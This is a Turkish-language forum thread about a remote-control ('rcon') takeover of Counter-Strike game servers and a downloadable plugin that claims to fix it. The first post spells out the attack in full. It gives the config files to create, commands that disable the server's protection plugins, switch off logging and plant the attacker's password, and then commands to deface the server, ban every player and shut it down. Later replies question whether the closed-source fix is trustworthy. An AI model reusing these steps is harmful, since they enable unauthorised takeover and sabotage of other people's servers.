Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Rcon Hack Fix (SendFile)
#1
Rcon hacklenmesinde ufak bir açık bulunmuştur.

Peki bu açıktan nasıl faydalanabiliyoruz?

Video:
[video=youtube;tgFeMjWAmFo]https://www.youtube.com/watch?v=tgFeMjWAmFo[/video]

"cstrike" send.cfg adlı bir dosya oluşturulur.

İçindeki dosyayı not defteri ile açıp şu kodlar yazılır.

wait; wait; wait
sendfile amxmodx/configs/maps/mapismi.cfg
(Yani serverda hangi map açıksa o mapın ismini yazarlar.)

daha sonra,

addons/amxmodx/configs/maps uzantılı bir dosya oluşturulur.

addons/amxmodx/configs/maps uzantısının içinde serverda açık olan mapınismi.cfg (de_dust2.cfg gibi.) bir config dosyası oluşturulur

ve içine şu kodlar yazılır.

amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
amxx pause krond
amxx pause function
rcon_password şifreniz (serveri hacklemek için kullanıcağınız rcon_password'dur. yani örnek olarak ben "hackleme" yapıcam. sizde konsola rcon_password hackleme yazıcaksınız.)
log off
mp_logfile 0


yazıldıktan sonra dosya kaydedilir.


daha sonra herhangi bir servera girildiğinde exec send.cfg yazılır.
bir zaman sonra rcon_password şifrenizi yazdığınızda, serveri hacklemeye başlıyorsunuz Smile

örneğin kodları vereyim.

rcon hostname "Hacked By xR."
rcon amx_banmenu
yazdıktan sonra herkesi banlamak Smile
rcon mp_freezetime 99999

rcon exit (bunu yazdığınızda server kapanır Smile )

gibi..



Ve bunun çözümü bir eklenti ile ortaya çıkmıştır.

KURULUM:
İçinde bulunan RconHack_Fix_SendFile.amxx adlı dosyayı addons/amxmodx/plugins dosyasının içine
RconHack_Fix_SendFile.amxx yazısını addons/amxmodx/configs/plugins.ini açarak en alt satıra ekleyin.
Serverda map değişin veya Servera res atın.

NOT: AMX MOD X ve METAMOD kurulu olan serverlarda geçerlidir.

Bu arada konuyu düzenlerseniz memmun olurum. Konu açma kuralları eklememişsiniz Smile


Attached Files
.rar   RconHack_Fix_SendFile.rar (Size: 1.78 KB / Downloads: 255)
"Türkiye'nin ilk ve tek Zombi Mod V2.0 Server!"

Facebook İletişim

__________________________________________________

Güncel IP:
95.173.173.180:27015
__________________________________________________
Reply
#2
Fixide Var Yani Smile
İletişim ;

MSN : DeaTReX[email protected]

SKYPE : DeaTReX

Fakelerim Çıkmaya Başlamış Lütfen [email protected] & DeaTReX Adreslerinden Başka Hesabım Yoktur Lütfen Onlara Kanmayınız !

Sunuculara Ve Serverlara Özel Plugin Ve Mod Kodlanır
Reply
#3
elbettte.
yaptığı işlem şudur;
eklentinin içinde rconu sürekli güncellemesidir. yani ne kadar değişsenizde default rcon yapıcak
"Türkiye'nin ilk ve tek Zombi Mod V2.0 Server!"

Facebook İletişim

__________________________________________________

Güncel IP:
95.173.173.180:27015
__________________________________________________
Reply
#4
Bu açıktan haberim var. yanlız fixi konusunda endişelerim var. Bu paylaşılan fix daha henüz yabancı sitelerde yok. veya ben bulamadım. Ayrıca bu eklentinin yapımcısı konuda belirtilmemiş. [MENTION=6745]xRteam45[/MENTION] eğer bu eklenti sendfile komutunu kitleyerek yapıldıysa kesin çözüm değildir. Farklı yollardan yapıldıysa fikrim yok. Veya başka bir senaryo düşünürsek eklentinin içinde illegal yollara götürcek kodlar olabilir. bu eklentiyi kurmadan önce 2 kere düşünmenizi tavsiye ederim. Eklentinin kaynak kodu yayımlanıncaya kadar eklentiyi ben onaylamıyorum. Aynı csf gibi içerisinde açıklar bırakılarak piyasaya sürülmüş olabilir. Wink
Reply
#5
Evet Nerdeyse Tüm Sunucularda Fixlendi Smile
İletişim ;

MSN : DeaTReX[email protected]

SKYPE : DeaTReX

Fakelerim Çıkmaya Başlamış Lütfen [email protected] & DeaTReX Adreslerinden Başka Hesabım Yoktur Lütfen Onlara Kanmayınız !

Sunuculara Ve Serverlara Özel Plugin Ve Mod Kodlanır
Reply
#6
xRteam45 dateline='' Wrote: elbettte.
yaptığı işlem şudur;
eklentinin içinde rconu sürekli güncellemesidir. yani ne kadar değişsenizde default rcon yapıcak

rconu sabit bir şifre mi yapıyor yoksa rconu boş mu yapıyor ?
Reply
#7
Sabit Yapıyor Galiba.
İletişim ;

MSN : DeaTReX[email protected]

SKYPE : DeaTReX

Fakelerim Çıkmaya Başlamış Lütfen [email protected] & DeaTReX Adreslerinden Başka Hesabım Yoktur Lütfen Onlara Kanmayınız !

Sunuculara Ve Serverlara Özel Plugin Ve Mod Kodlanır
Reply
#8
Keşke eklentinin kaynağıda paylaşılsaydı . Geçenlerde rastladığım plugin galiba. Orphenun fonksiyonları ile kodlanmıştı. Rcon şifresini ne yaparsanız yapın şifreyi boş yapıyor. Md5 ile şifrelenmiş şifre üzerinden çekiyor . Aynı sistemi ben kullandım ve yine hacklenebiliyor Wink Bu işin çözümü rcon kullanmamak sanırım. Yada 1 çözüm daha var ama anlatmak için boş vaktim yok Wink
Reply
#9
Ne Zmn Oldu Big Grin
İletişim ;

MSN : DeaTReX[email protected]

SKYPE : DeaTReX

Fakelerim Çıkmaya Başlamış Lütfen [email protected] & DeaTReX Adreslerinden Başka Hesabım Yoktur Lütfen Onlara Kanmayınız !

Sunuculara Ve Serverlara Özel Plugin Ve Mod Kodlanır
Reply
#10
kurban yapmaya çalışan kişi rcon_password değiştirmeyi kalktığı zaman konsolda böyle bir hataya rastlar Smile



] rcon hostname
Bad rcon_password.
No password set for this server.

- - - - - - - - - -

kaynak: https://forums.alliedmods.net/showthread.php?p=1981283
"Türkiye'nin ilk ve tek Zombi Mod V2.0 Server!"

Facebook İletişim

__________________________________________________

Güncel IP:
95.173.173.180:27015
__________________________________________________
Reply


Foruma Atla:


Users browsing this thread: 1 Guest(s)